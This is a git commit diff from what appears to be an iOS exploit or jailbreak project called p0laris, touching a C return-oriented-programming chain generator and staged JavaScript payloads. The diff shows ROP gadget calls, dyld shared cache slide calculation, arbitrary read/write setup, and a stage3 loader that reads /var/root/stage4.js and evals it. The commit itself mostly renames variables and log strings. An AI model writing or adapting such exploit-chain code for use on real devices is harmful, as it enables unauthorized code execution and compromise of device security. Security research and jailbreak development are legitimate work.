yahtzee

4 files changed, 25 insertions, 14 deletions

diff --git a/src/gen/stage2.c b/src/gen/stage2.c
index 63dccc1..1b18d16 100644
--- a/src/gen/stage2.c
+++ b/src/gen/stage2.c
@@ -281,13 +281,14 @@ rop_chain_shit gen_rop_chain(uint32_t base,
 
 //	CALL_4_ARG_L2_0(base + 0x9ad8c, LOG_SYSLOG, base + we_out_here_addr);
 
-	/* allocate memory for file read later */
+/*
+	/* allocate memory for file read later *\/
 	CALL_1ARG(base + malloc_addr, 0x100000);
 	STR_R0(base + reserve_addr);
 	MOV_R1_R0();
 
-	/* output malloc string */
-	CALL_1ARG(base + printf_addr, base + malloc_status_addr);
+	/* output malloc string *\/
+	CALL_1ARG(base + printf_addr, base + malloc_status_addr);*/
 
 	/* calculate dyld_shared_cache slide */
 	MOV_R0(0 - (0x20000000 + scprefcreate_dsc_offset));
diff --git a/src/js/main.js b/src/js/main.js
index 905c4ef..6c1c9a5 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -48,7 +48,8 @@ var kCFBooleanFalse;
 var kCFPreferencesAnyUser;
 var kCFPreferencesCurrentHost;
 var kIOMasterPortDefault = NULL;
-var options = {};
+var p0laris = {};
+p0laris.options = {};
 
 var sanity_port = 0;
 var MACH_PORT_RIGHT_RECEIVE = 0x1;
@@ -97,11 +98,16 @@ function parse_nvram_options() {
 			for (var i = 0; i < p0laris_options_buf.length; i++) {
 				p0laris_options_js_str += String.fromCharCode(p0laris_options_buf[i]);
 			}
-			options = JSON.parse(p0laris_options_js_str);
+			p0laris.options = JSON.parse(p0laris_options_js_str);
 		}
 	}
 }
 
+function p0laris_object_general() {
+	p0laris.dyld_shc_slide = get_dyld_shc_slide();
+	p0laris.racoon_slide = get_our_slide();
+}
+
 function main() {
 	/*
 	 *  get slide and calculate slid base
@@ -121,16 +127,16 @@ function main() {
 	syslog(LOG_SYSLOG, "we out here");
 	syslog(LOG_SYSLOG, "stage3");
 
-	puts("we out here");
-	puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
-
-	var dyld_shc_slide = get_dyld_shc_slide();
+	puts("[*] we out here");
+	puts("[*] landed in stage3");
 
 	setup_fancy_rw();
 
 	parse_nvram_options();
+	
+	p0laris_object_general();
 
-	if (options["sleep_spin"] === true) {
+	if (p0laris.options.sleep_spin === true) {
 		while (1) {
 			sleep(3600);
 		}
@@ -138,6 +144,7 @@ function main() {
 
 	var stage4_bin = malloc(0x400000);
 
+	printf("[*] loading stage4...\n");
 	var fd = open("/var/root/stage4.js", O_RDONLY, 0);
 	var bytes_read = read(fd, stage4_bin, 0x400000);
 	var stage4_bin_buf = read_buf(stage4_bin, bytes_read);
@@ -146,7 +153,7 @@ function main() {
 		stage4_js_str += String.fromCharCode(stage4_bin_buf[i]);
 	}
 
-	printf("stage4 time baby\n");
+	printf("[*] entering stage4...\n");
 	eval(stage4_js_str);
 
 	exit(main());
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index d664e7b..f6a0f8b 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -226,7 +226,7 @@ function init_sptr_heap() {
 	sptr_size = 0x1000000;
 	sptr_len = 0;
 
-	calls4arg("printf\0", sptr("sptr_heap=%p\n"), global_sptr_addy, 0, 0);
+	calls4arg("printf\0", sptr("[*] sptr_heap=%p\n"), global_sptr_addy, 0, 0);
 
 	return global_sptr_addy;
 }
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 4947a77..328bb0a 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -1,6 +1,9 @@
 function main() {
-	printf("landed in stage4\n");
-	syslog(LOG_SYSLOG, "we out here in stage 4");
+	printf("[*] landed in stage4\n");
+	syslog(LOG_SYSLOG, "we out here");
+
+	printf("[*] p0laris.dyld_shc_slide=0x%08x\n", p0laris.dyld_shc_slide);
+	printf("[*] p0laris.racoon_slide=0x%08x\n", p0laris.racoon_slide);
 
 	return 0;
 }
\ No newline at end of file